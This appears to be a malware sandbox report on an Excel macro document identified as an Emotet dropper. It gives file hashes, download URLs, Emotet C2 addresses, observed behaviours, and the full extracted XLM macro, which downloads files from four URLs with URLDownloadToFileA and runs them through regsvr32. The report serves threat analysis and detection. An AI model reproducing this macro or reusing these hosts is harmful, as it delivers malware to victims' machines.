General

  • Target

    pack 7530987.xlsm

  • Size

    228KB

  • Sample

    221118-deg3gacc8s

  • MD5

    0be38d7e3fe5fc3a79a597ed1d254a50

  • SHA1

    f4eb84f6b1297f57e57780aa7fcabe6438880d40

  • SHA256

    da644b867f32f4c76681fd2a7838d843f447f06f87a5ea98786031f0caf169cc

  • SHA512

    e589d28f3394e198fd8cebf453952973c6967922b171d4f997499d78dd297ee62567418ce621b84848aa1d9d7e4258bd12b287de198a456b70450775b94f81b2

  • SSDEEP

    6144:9w2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyO:9w2LDHf9PH5XUqRLTyO

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

httph.com/nutabalong/CfyFMHWntM3t/

https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/

http://bet-invest.com/mail/nui/

https://www.manchesterot.co.uk/about-us/KEfGo/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"httph.com/nutabalong/CfyFMHWntM3t/","..\oxnv1.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/","..\oxnv2.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bet-invest.com/mail/nui/","..\oxnv3.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/KEfGo/","..\oxnv4.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

httph.com/nutabalong/CfyFMHWntM3t/

xlm40.dropper

https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/

xlm40.dropper

http://bet-invest.com/mail/nui/

xlm40.dropper

https://www.manchesterot.co.uk/about-us/KEfGo/

Extracted

Family

emotet

Botnet

Epoch5

C2

178.238.225.252:8080

139.196.72.155:8080

36.67.23.59:443

103.56.149.105:8080

37.44.244.177:8080

85.25.120.45:8080

202.134.4.210:7080

78.47.204.80:443

83.229.80.93:8080

93.104.209.107:8080

80.211.107.116:8080

165.22.254.236:8080

104.244.79.94:443

185.148.169.10:8080

190.145.8.4:443

175.126.176.79:8080

139.59.80.108:8080

188.165.79.151:443

128.199.217.206:443

64.227.55.231:8080

ecs1.plain
eck1.plain

Targets

    • Target

      pack 7530987.xlsm

    • Size

      228KB

    • MD5

      0be38d7e3fe5fc3a79a597ed1d254a50

    • SHA1

      f4eb84f6b1297f57e57780aa7fcabe6438880d40

    • SHA256

      da644b867f32f4c76681fd2a7838d843f447f06f87a5ea98786031f0caf169cc

    • SHA512

      e589d28f3394e198fd8cebf453952973c6967922b171d4f997499d78dd297ee62567418ce621b84848aa1d9d7e4258bd12b287de198a456b70450775b94f81b2

    • SSDEEP

      6144:9w2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyO:9w2LDHf9PH5XUqRLTyO

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Adds Run key to start application

MITRE ATT&CK Enterprise v6

Tasks